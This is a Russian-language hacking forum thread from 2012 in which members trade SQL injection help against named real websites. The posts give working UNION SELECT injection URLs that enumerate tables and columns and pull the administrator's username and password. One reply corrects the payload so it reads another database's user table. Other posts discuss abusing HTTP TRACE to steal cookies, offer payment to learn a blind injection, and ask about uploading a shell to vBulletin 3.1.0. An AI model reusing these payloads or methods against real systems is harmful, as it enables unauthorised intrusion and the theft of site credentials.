16.08.2012, 18:02
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
Сообщение от InDuStRieS
http://www.intim.dn.ua/catalog/vender.php?id=412'+order+by+10&meta_id=1790
Почему тут не работает?
Не выводит
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
|
|
|
16.08.2012, 18:22
|
|
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
С нами:
9030789
Репутация:
704
|
|
Сообщение от er9j6@
блиндом выводится
5.0.51a-24+lenny5-log:intimLBj:u_intimLBj@localhost:debian-linux-gnu
Не со всем понятно,там же мускл ошибка выводиться..
В любом случае чтобы тут не флудить,просьба отписать в личку или в аську 564714
Готов финансово вознаградить,нужно обьяснить как ты вывел
|
|
|
|
16.08.2012, 18:44
|
|
Новичок
Регистрация: 16.10.2011
Сообщений: 11
С нами:
7670486
Репутация:
0
|
|
Подскажите актуальные методы trace
|
|
|
|
16.08.2012, 21:01
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
|
|
|
|
17.08.2012, 19:02
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Dad69
Этот метод тебе ничего не даст, потому что сложно заставить браузер жертвы отослать запрос TRACE, он используется если в двух словах просто для отражения запроса обратно к клиенту, т.е. теоретически если бы ты смог заставить жертву отослать такой запрос, сервер вернул бы эту информацию назад, например куки жертвы.
Но не знаю на сегодняшний день позволяет ли хоть один браузер такое делать. Вот если бы там был рабочий метод PUT ))
Собственно BigBear дал ссылки на описание.
|
|
|
|
17.08.2012, 21:10
|
|
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами:
7232726
Репутация:
0
|
|
Подскажите, плиз, подобрал колонки, хочу вывести логин и пасс админа, но не получается.
Для таблиц
Сообщение от None
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,table_name,3%20from%20informati on_schema.tables%20limit%2044,1%20--
Для колонок
Сообщение от None
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,group_concat%28column_name%29,3 +from+information_schema.columns+where+table_name= 0x75736572--
Для вывода админа
Сообщение от None
www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws(username,password),3 from+user+limit+1,1 --
Почему данные админа не выводятся? |
|
|
|
17.08.2012, 21:23
|
|
Постоянный
Регистрация: 10.06.2011
Сообщений: 939
С нами:
7854806
Репутация:
173
|
|
Сообщение от sobvit
Почему данные админа не выводятся?
Сообщение от None
http://www.mcguireprogramme.com/about_us.php?id=3-1.1+UNION+SELECT+1,concat_ws%280x3a,username,passw ord%29,3%20from+crt_main.user+limit+0,1--
.....
|
|
|
|
17.08.2012, 21:36
|
|
Новичок
Регистрация: 15.08.2012
Сообщений: 2
С нами:
7232726
Репутация:
0
|
|
Сообщение от OxoTnik
.....
А почему надо использовать такую конструкцию записи (crt_main.user) ?
|
|
|
|
17.08.2012, 21:38
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от sobvit
А почему надо использовать такую конструкцию записи (crt_main.user) ?
потому что таблица в другой базе, читайте учебники , дальше буду удалять
|
|
|
|
18.08.2012, 16:37
|
|
Постоянный
Регистрация: 12.10.2011
Сообщений: 569
С нами:
7676246
Репутация:
94
|
|
Пытаюсь залить шелл в vBulletin 3.1.0 с помощью XML шелла.
Тут при загрузке происходит ошибка "XML Error: Reserved XML Name at Line 1".
В чем проблема?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
